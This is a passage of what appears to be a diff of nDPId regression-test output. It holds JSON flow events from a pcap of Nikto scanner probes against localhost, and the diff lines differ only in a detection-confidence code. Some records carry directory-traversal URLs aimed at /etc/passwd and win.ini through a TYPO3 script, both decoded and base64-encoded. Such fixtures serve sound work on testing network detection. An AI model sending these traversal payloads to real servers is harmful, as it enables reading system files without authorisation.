{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} -01145{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01145{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 